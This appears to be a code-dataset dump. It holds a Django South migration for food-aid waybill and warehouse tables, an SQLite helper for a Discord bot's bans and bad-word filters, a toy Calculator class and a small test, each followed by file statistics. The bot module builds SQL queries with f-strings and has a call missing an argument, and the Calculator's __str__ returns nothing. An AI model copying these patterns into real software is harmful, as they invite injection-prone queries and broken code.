inputs=[postprocess_name, shape_name],
outputs=self.outputs,
name=self.name + "_reshape"
)
node_list.append(node)
return node_list, value_list
| 33.194529
| 84
| 0.662027
| 1,355
| 10,921
| 5.087823
| 0.087823
| 0.02785
| 0.031332
| 0.02785
| 0.935016
| 0.935016
| 0.935016
| 0.935016
| 0.922541
| 0.922541
| 0
| 0.012896
| 0.233129
| 10,921
| 328
| 85
| 33.295732
| 0.810269
| 0.073437
| 0
| 0.869863
| 0
| 0
| 0.045297
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0
| 0.020548
| 0
| 0.047945
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24207cb8de31722021ccad5557890aecc7770ed6
| 11,824
|
py
|
Python
|
datawinners/custom_reports/crs/migrations/0001_initial.py
|
ICT4H/dcs-web
|
fb0f53fad4401cfac1c1789ff28b9d5bda40c975
|
[
"Apache-2.0"
] | 1
|
2015-11-02T09:11:12.000Z
|
2015-11-02T09:11:12.000Z
|
datawinners/custom_reports/crs/migrations/0001_initial.py
|
ICT4H/dcs-web
|
fb0f53fad4401cfac1c1789ff28b9d5bda40c975
|
[
"Apache-2.0"
] | null | null | null |
datawinners/custom_reports/crs/migrations/0001_initial.py
|
ICT4H/dcs-web
|
fb0f53fad4401cfac1c1789ff28b9d5bda40c975
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'WayBillSent'
db.create_table('crs_waybillsent', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('q1', self.gf('django.db.models.fields.TextField')(db_column='pl_code')),
('q2', self.gf('django.db.models.fields.TextField')(db_column='waybill_code')),
('q3', self.gf('django.db.models.fields.DateField')(db_column='sent_date')),
('q4', self.gf('django.db.models.fields.TextField')(null=True, db_column='transaction_type')),
('q5', self.gf('django.db.models.fields.TextField')(null=True, db_column='site_code')),
('q6', self.gf('django.db.models.fields.TextField')(db_column='sender_name')),
('q7', self.gf('django.db.models.fields.TextField')(db_column='truck_id')),
('q8', self.gf('django.db.models.fields.TextField')(db_column='food_type')),
('q9', self.gf('django.db.models.fields.FloatField')(db_column='weight')),
))
db.send_create_signal('crs', ['WayBillSent'])
# Adding model 'WayBillReceived'
db.create_table('crs_waybillreceived', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('q1', self.gf('django.db.models.fields.TextField')(db_column='pl_code')),
('q2', self.gf('django.db.models.fields.TextField')(db_column='waybill_code')),
('q3', self.gf('django.db.models.fields.TextField')(db_column='site_code')),
('q4', self.gf('django.db.models.fields.TextField')(db_column='receiver_name')),
('q5', self.gf('django.db.models.fields.DateField')(db_column='received_date')),
('q6', self.gf('django.db.models.fields.TextField')(db_column='truck_id')),
('q7', self.gf('django.db.models.fields.FloatField')(db_column='good_net_weight')),
('q8', self.gf('django.db.models.fields.FloatField')(db_column='damaged_net_weight')),
))
db.send_create_signal('crs', ['WayBillReceived'])
# Adding model 'SFMDistribution'
db.create_table('crs_sfmdistribution', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('q1', self.gf('django.db.models.fields.TextField')(db_column='site_code')),
('q2', self.gf('django.db.models.fields.DateField')(db_column='distribution_date')),
('q3', self.gf('django.db.models.fields.TextField')(db_column='received_waybill_code')),
('q4', self.gf('django.db.models.fields.FloatField')(db_column='distributed_oil_quantity')),
('q5', self.gf('django.db.models.fields.FloatField')(db_column='distributed_csb_quantity')),
('q6', self.gf('django.db.models.fields.TextField')(db_column='returned_waybill_code')),
('q7', self.gf('django.db.models.fields.IntegerField')(db_column='returned_oil_quantity')),
('q8', self.gf('django.db.models.fields.IntegerField')(db_column='returned_csb_quantity')),
))
db.send_create_signal('crs', ['SFMDistribution'])
# Adding model 'PhysicalInventorySheet'
db.create_table('crs_physicalinventorysheet', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('q1', self.gf('django.db.models.fields.TextField')(db_column='store_house_code')),
('q2', self.gf('django.db.models.fields.DateField')(db_column='physical_inventory_closing_date')),
('q3', self.gf('django.db.models.fields.DateField')(db_column='actual_physical_inventory_date')),
('q4', self.gf('django.db.models.fields.TextField')(db_column='pl_code')),
('q5', self.gf('django.db.models.fields.TextField')(db_column='food_type')),
('q6', self.gf('django.db.models.fields.FloatField')(db_column='good_net_weight')),
('q7', self.gf('django.db.models.fields.FloatField')(db_column='damaged_net_weight')),
))
db.send_create_signal('crs', ['PhysicalInventorySheet'])
# Adding model 'SiteActivities'
db.create_table('crs_siteactivities', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('q1', self.gf('django.db.models.fields.TextField')(db_column='fiscal_year_with_initials')),
('q2', self.gf('django.db.models.fields.TextField')(db_column='site_location')),
('q3', self.gf('django.db.models.fields.TextField')(db_column='site_gps_coordinates')),
('q4', self.gf('django.db.models.fields.TextField')(db_column='tel_no')),
('q5', self.gf('django.db.models.fields.TextField')(db_column='site_person_responsible')),
('q6', self.gf('django.db.models.fields.TextField')(db_column='type_of_activity')),
('q7', self.gf('django.db.models.fields.TextField')(db_column='site_code')),
))
db.send_create_signal('crs', ['SiteActivities'])
# Adding model 'Warehouse'
db.create_table('crs_warehouse', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('q1', self.gf('django.db.models.fields.TextField')(db_column='name')),
('q2', self.gf('django.db.models.fields.TextField')(db_column='address')),
('q3', self.gf('django.db.models.fields.TextField')(db_column='gps_coordinates')),
('q4', self.gf('django.db.models.fields.TextField')(db_column='tel_no')),
('q5', self.gf('django.db.models.fields.TextField')(db_column='initials')),
))
db.send_create_signal('crs', ['Warehouse'])
def backwards(self, orm):
# Deleting model 'WayBillSent'
db.delete_table('crs_waybillsent')
# Deleting model 'WayBillReceived'
db.delete_table('crs_waybillreceived')
# Deleting model 'SFMDistribution'
db.delete_table('crs_sfmdistribution')
# Deleting model 'PhysicalInventorySheet'
db.delete_table('crs_physicalinventorysheet')
# Deleting model 'SiteActivities'
db.delete_table('crs_siteactivities')
# Deleting model 'Warehouse'
db.delete_table('crs_warehouse')
models = {
'crs.physicalinventorysheet': {
'Meta': {'object_name': 'PhysicalInventorySheet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'q1': ('django.db.models.fields.TextField', [], {'db_column': "'store_house_code'"}),
'q2': ('django.db.models.fields.DateField', [], {'db_column': "'physical_inventory_closing_date'"}),
'q3': ('django.db.models.fields.DateField', [], {'db_column': "'actual_physical_inventory_date'"}),
'q4': ('django.db.models.fields.TextField', [], {'db_column': "'pl_code'"}),
'q5': ('django.db.models.fields.TextField', [], {'db_column': "'food_type'"}),
'q6': ('django.db.models.fields.FloatField', [], {'db_column': "'good_net_weight'"}),
'q7': ('django.db.models.fields.FloatField', [], {'db_column': "'damaged_net_weight'"})
},
'crs.sfmdistribution': {
'Meta': {'object_name': 'SFMDistribution'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'q1': ('django.db.models.fields.TextField', [], {'db_column': "'site_code'"}),
'q2': ('django.db.models.fields.DateField', [], {'db_column': "'distribution_date'"}),
'q3': ('django.db.models.fields.TextField', [], {'db_column': "'received_waybill_code'"}),
'q4': ('django.db.models.fields.FloatField', [], {'db_column': "'distributed_oil_quantity'"}),
'q5': ('django.db.models.fields.FloatField', [], {'db_column': "'distributed_csb_quantity'"}),
'q6': ('django.db.models.fields.TextField', [], {'db_column': "'returned_waybill_code'"}),
'q7': ('django.db.models.fields.IntegerField', [], {'db_column': "'returned_oil_quantity'"}),
'q8': ('django.db.models.fields.IntegerField', [], {'db_column': "'returned_csb_quantity'"})
},
'crs.siteactivities': {
'Meta': {'object_name': 'SiteActivities'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'q1': ('django.db.models.fields.TextField', [], {'db_column': "'fiscal_year_with_initials'"}),
'q2': ('django.db.models.fields.TextField', [], {'db_column': "'site_location'"}),
'q3': ('django.db.models.fields.TextField', [], {'db_column': "'site_gps_coordinates'"}),
'q4': ('django.db.models.fields.TextField', [], {'db_column': "'tel_no'"}),
'q5': ('django.db.models.fields.TextField', [], {'db_column': "'site_person_responsible'"}),
'q6': ('django.db.models.fields.TextField', [], {'db_column': "'type_of_activity'"}),
'q7': ('django.db.models.fields.TextField', [], {'db_column': "'site_code'"})
},
'crs.warehouse': {
'Meta': {'object_name': 'Warehouse'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'q1': ('django.db.models.fields.TextField', [], {'db_column': "'name'"}),
'q2': ('django.db.models.fields.TextField', [], {'db_column': "'address'"}),
'q3': ('django.db.models.fields.TextField', [], {'db_column': "'gps_coordinates'"}),
'q4': ('django.db.models.fields.TextField', [], {'db_column': "'tel_no'"}),
'q5': ('django.db.models.fields.TextField', [], {'db_column': "'initials'"})
},
'crs.waybillreceived': {
'Meta': {'object_name': 'WayBillReceived'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'q1': ('django.db.models.fields.TextField', [], {'db_column': "'pl_code'"}),
'q2': ('django.db.models.fields.TextField', [], {'db_column': "'waybill_code'"}),
'q3': ('django.db.models.fields.TextField', [], {'db_column': "'site_code'"}),
'q4': ('django.db.models.fields.TextField', [], {'db_column': "'receiver_name'"}),
'q5': ('django.db.models.fields.DateField', [], {'db_column': "'received_date'"}),
'q6': ('django.db.models.fields.TextField', [], {'db_column': "'truck_id'"}),
'q7': ('django.db.models.fields.FloatField', [], {'db_column': "'good_net_weight'"}),
'q8': ('django.db.models.fields.FloatField', [], {'db_column': "'damaged_net_weight'"})
},
'crs.waybillsent': {
'Meta': {'object_name': 'WayBillSent'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'q1': ('django.db.models.fields.TextField', [], {'db_column': "'pl_code'"}),
'q2': ('django.db.models.fields.TextField', [], {'db_column': "'waybill_code'"}),
'q3': ('django.db.models.fields.DateField', [], {'db_column': "'sent_date'"}),
'q4': ('django.db.models.fields.TextField', [], {'null': 'True', 'db_column': "'transaction_type'"}),
'q5': ('django.db.models.fields.TextField', [], {'null': 'True', 'db_column': "'site_code'"}),
'q6': ('django.db.models.fields.TextField', [], {'db_column': "'sender_name'"}),
'q7': ('django.db.models.fields.TextField', [], {'db_column': "'truck_id'"}),
'q8': ('django.db.models.fields.TextField', [], {'db_column': "'food_type'"}),
'q9': ('django.db.models.fields.FloatField', [], {'db_column': "'weight'"})
}
}
complete_apps = ['crs']
| 63.913514
| 113
| 0.597344
| 1,331
| 11,824
| 5.108941
| 0.078137
| 0.118824
| 0.205882
| 0.294118
| 0.820294
| 0.811029
| 0.807941
| 0.807941
| 0.798235
| 0.775
| 0
| 0.00937
| 0.187669
| 11,824
| 184
| 114
| 64.26087
| 0.698594
| 0.033068
| 0
| 0.197368
| 0
| 0
| 0.522375
| 0.347841
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013158
| false
| 0
| 0.026316
| 0
| 0.059211
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2449c6d019fcce3aab6a7291982055d081dc8112
| 9,426
|
py
|
Python
|
resources/LOCAL_DATABASE.py
|
PyBot-Development/PyBot-v4
|
7fb821940bf43ded7d6996342b83afda4174d36e
|
[
"MIT"
] | null | null | null |
resources/LOCAL_DATABASE.py
|
PyBot-Development/PyBot-v4
|
7fb821940bf43ded7d6996342b83afda4174d36e
|
[
"MIT"
] | null | null | null |
resources/LOCAL_DATABASE.py
|
PyBot-Development/PyBot-v4
|
7fb821940bf43ded7d6996342b83afda4174d36e
|
[
"MIT"
] | null | null | null |
import sqlite3
try: from resources import support
except: import support
from datetime import datetime
import string
con = sqlite3.connect(f'{support.path}/data/local.db')
c = con.cursor()
async def GET_GUILD_LETTERS(guild_id):
text = "".join(string.ascii_lowercase[int(i)] for i in str(guild_id))
return f"{str(text).upper()}_"
async def GUILD_CHECK(guild):
c.execute(f'''CREATE TABLE IF NOT EXISTS {await GET_GUILD_LETTERS(guild.id)}users (id text, username text, admin text, banned text, ban_reason text, banned_by text, banned_date text, ban_duration text)''')
c.execute(f'''CREATE TABLE IF NOT EXISTS {await GET_GUILD_LETTERS(guild.id)}badwords (word text, added_by text)''')
c.execute(f'''CREATE TABLE IF NOT EXISTS {await GET_GUILD_LETTERS(guild.id)}banned_channels (id text, channel_name text, added_by text)''')
c.execute(f'''CREATE TABLE IF NOT EXISTS {await GET_GUILD_LETTERS(guild.id)}disabled_cmds (command text, added_by text)''')
async def GET_USER(guild, user):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
if u is None:
c.execute(f'INSERT INTO {await GET_GUILD_LETTERS(guild.id)}users VALUES (?, ?, "0", "0", "Null", "Null", "Null", "Null")', (user.id, str(user), ))
con.commit()
return c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
async def ADMIN_CHECK(guild, user):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}" AND admin="1"''').fetchone()
return u is not None
async def BANNED_CHECK(guild, user):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}" AND banned="1"''').fetchone()
return u is not None
async def GET_USER_DATA(guild, user):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
if u is None:
return f"User {user} not found in database."
else:
return u
async def OP_USER(guild, user):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
if u is None:
c.execute(f'INSERT INTO {await GET_GUILD_LETTERS(guild.id)}users VALUES (?, ?, "1", "0", "Null", "Null", "Null", "Null")', (user.id, str(user), ))
else:
c.execute(f'''UPDATE {await GET_GUILD_LETTERS(guild.id)}users SET admin="1" WHERE id="{user.id}"''')
con.commit()
return True
async def DEOP_USER(guild, user):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}" AND admin="1"''').fetchone()
if u is None:
return False
c.execute(f'''UPDATE {await GET_GUILD_LETTERS(guild.id)}users SET admin="0" WHERE id="{user.id}"''')
con.commit()
return True
async def BAN_USER(guild, user, reason, author):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
if u is None:
c.execute(f'INSERT INTO {await GET_GUILD_LETTERS(guild.id)}users VALUES (?, ?, "0", "1", ?, ?, ?, "Null")', (str(user.id), str(user), str(reason), str(author.mention), str(datetime.utcnow()), ))
else:
c.execute(f'''UPDATE {await GET_GUILD_LETTERS(guild.id)}users SET banned=?, ban_reason=?, banned_by=?, banned_date=?, ban_duration="Null" WHERE id="{user.id}"''', ("1", str(reason), str(author.mention), str(datetime.utcnow())), )
con.commit()
return True
async def TEMPBAN_USER(guild, user, reason, author, timestamp):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
if u is None:
c.execute(f'INSERT INTO {await GET_GUILD_LETTERS(guild.id)}users VALUES (?, ?, "0", "1", ?, ?, ?, ?)', (user.id, str(user), str(reason), str(author.mention), str(datetime.utcnow()), str(timestamp)), )
else:
c.execute(f'''UPDATE {await GET_GUILD_LETTERS(guild.id)}users SET banned=?, ban_reason=?, banned_by=?, banned_date=?, ban_duration="{timestamp}" WHERE id="{user.id}"''', ("1", str(reason), str(author.mention), str(datetime.utcnow())), )
con.commit()
return True
async def UNBAN_USER(guild, user):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}" AND banned="1"''').fetchone()
if u is None:
return False
c.execute(f'''UPDATE {await GET_GUILD_LETTERS(guild.id)}users SET banned="0", ban_reason="Null", banned_by="Null", banned_date="Null", ban_duration="Null" WHERE id="{user.id}"''')
con.commit()
return True
async def CHECK_TEMPBAN(guild, user):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
if (
u is not None
and await BANNED_CHECK(guild, user)
and c.execute(
f'''SELECT ban_duration FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"'''
).fetchone()[0]
!= "Null"
):
time=c.execute(f'''SELECT ban_duration FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
if int(time[0]) > int(datetime.timestamp(datetime.utcnow())):
return True
await UNBAN_USER(user)
return False
async def GET_BANNED(guild):
u = c.execute(f'''SELECT id FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE banned="1"''').fetchall()
banned = []
u = list(u)
for item in u:
i = list(item)
banned.append(i[0])
return banned
async def GET_OPS(guild):
u = c.execute(f'''SELECT id FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE admin="1"''').fetchall()
banned = []
u = list(u)
for item in u:
i = list(item)
banned.append(i[0])
return banned
async def REMOVE_BADWORD(guild, word:str):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}badwords WHERE word=?''', (word.lower(), )).fetchone()
if u is None:
return False
c.execute(f'''DELETE FROM {await GET_GUILD_LETTERS(guild.id)}badwords WHERE word=?''', (word.lower(), ))
con.commit()
return True
async def ADD_BADWORD(guild, word, author):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}badwords WHERE word=?''', (word.lower(), )).fetchone()
if u is None:
c.execute(f'INSERT INTO {await GET_GUILD_LETTERS(guild.id)}badwords VALUES (?, ?)', (str(word.lower()), str(author), ))
con.commit()
return True
else:
return False
async def GET_BADWORDS(guild):
return [row[0] for row in c.execute(f"SELECT word FROM {await GET_GUILD_LETTERS(guild.id)}badwords")]
async def WHO_CREATED_BADWORD(guild, word):
return c.execute(f"SELECT added_by FROM {await GET_GUILD_LETTERS(guild.id)}badwords WHERE word=?", (word, )).fetchone()[0]
async def REMOVE_CHANNEL(guild, channel):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}banned_channels WHERE id=?''', (str(channel.id), )).fetchone()
if u is None:
return False
c.execute(f'''DELETE FROM {await GET_GUILD_LETTERS(guild.id)}banned_channels WHERE id=?''', (str(channel.id), ))
con.commit()
return True
async def ADD_CHANNEL(guild, channel, author):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}banned_channels WHERE id=?''', (str(channel.id), )).fetchone()
if u is None:
c.execute(f'INSERT INTO {await GET_GUILD_LETTERS(guild.id)}banned_channels VALUES (?, ?, ?)', (str(channel.id), str(channel), str(author), ))
con.commit()
return True
else:
return False
async def CHANNEL_CHECK(guild, channel):
i = c.execute(f"SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}banned_channels WHERE id=?", (str(channel.id), )).fetchone()
return i != None
async def GET_ALL_ADMINS(guild):
return c.execute(f"SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE admin='1'").fetchall()
async def GET_ALL_BANNED(guild):
return c.execute(f"SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE banned='1'").fetchall()
async def ENABLE_COMMAND(guild, cmd:str):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds WHERE command=?''', (cmd, )).fetchone()
if u is None:
return False
c.execute(f'''DELETE FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds WHERE command=?''', (cmd, ))
con.commit()
return True
async def DISABLE_COMMAND(guild, cmd:str, author):
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds WHERE command=?''', (cmd, )).fetchone()
if u is None:
c.execute(f'INSERT INTO {await GET_GUILD_LETTERS(guild.id)}disabled_cmds VALUES (?, ?)', (str(cmd), str(author), ))
con.commit()
return True
else:
return False
async def GET_COMMANDS(guild):
return [row[0] for row in c.execute(f"SELECT command FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds")]
async def COMMAND_CHECK(guild, cmd):
cmd = str(cmd)
u = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds WHERE command=?''', (cmd, )).fetchone()
return u is not None
async def WHO_CREATED_COMMANDS(guild, cmd:str):
return c.execute(f"SELECT added_by FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds WHERE command=?", (cmd, )).fetchone()[0]
| 48.587629
| 244
| 0.664439
| 1,438
| 9,426
| 4.234353
| 0.077191
| 0.057481
| 0.120709
| 0.160946
| 0.814419
| 0.799967
| 0.795533
| 0.778124
| 0.759238
| 0.734439
| 0
| 0.003955
| 0.16847
| 9,426
| 194
| 245
| 48.587629
| 0.772901
| 0
| 0
| 0.512048
| 0
| 0.10241
| 0.454227
| 0.189138
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03012
| 0
| 0.253012
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0328ddc1b9b266e9481559cf41458c5dcfb67306
| 69
|
py
|
Python
|
vprint/tests/really_long_name_for_testing_truncation.py
|
xkortex/vprint
|
36735669ae2822f9a75ad9524efaa56d01c87ff5
|
[
"Unlicense"
] | null | null | null |
vprint/tests/really_long_name_for_testing_truncation.py
|
xkortex/vprint
|
36735669ae2822f9a75ad9524efaa56d01c87ff5
|
[
"Unlicense"
] | null | null | null |
vprint/tests/really_long_name_for_testing_truncation.py
|
xkortex/vprint
|
36735669ae2822f9a75ad9524efaa56d01c87ff5
|
[
"Unlicense"
] | null | null | null |
def test_long_name():
from vprint import aprint
aprint('hi')
| 17.25
| 29
| 0.681159
| 10
| 69
| 4.5
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217391
| 69
| 3
| 30
| 23
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.028986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
036cc4ef43181d62898f813652a7ef1ffe43bf74
| 668
|
py
|
Python
|
class12pythoncbse-master/Chapter 4/Question12.py
|
SubrataSarkar32/college3rdsem3035
|
5cb501d0bf3742029121076cb7a2affa97d2a13b
|
[
"Apache-2.0"
] | null | null | null |
class12pythoncbse-master/Chapter 4/Question12.py
|
SubrataSarkar32/college3rdsem3035
|
5cb501d0bf3742029121076cb7a2affa97d2a13b
|
[
"Apache-2.0"
] | null | null | null |
class12pythoncbse-master/Chapter 4/Question12.py
|
SubrataSarkar32/college3rdsem3035
|
5cb501d0bf3742029121076cb7a2affa97d2a13b
|
[
"Apache-2.0"
] | null | null | null |
class Calculator:
def __init__(self,value=0.0):
self.num=float(value)
def __add__(self,y):
self.num=self.num+y
return Calculator(self.num)
def __sub__(self,y):
self.num=self.num-y
return Calculator(self.num)
def __mul__(self,y):
self.num=self.num*y
return Calculator(self.num)
def __div__(self,y):
self.num=self.num/y
return Calculator(self.num)
def __mod__(self,y):
self.num=self.num%y
return Calculator(self.num)
def __pow__(self,y):
self.num=self.num**y
return Calculator(self.num)
def __str__(self):
print str(self.num)
| 27.833333
| 35
| 0.600299
| 97
| 668
| 3.804124
| 0.195876
| 0.379404
| 0.146341
| 0.195122
| 0.747967
| 0.747967
| 0.747967
| 0.747967
| 0.747967
| 0.747967
| 0
| 0.004124
| 0.273952
| 668
| 23
| 36
| 29.043478
| 0.756701
| 0
| 0
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.043478
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.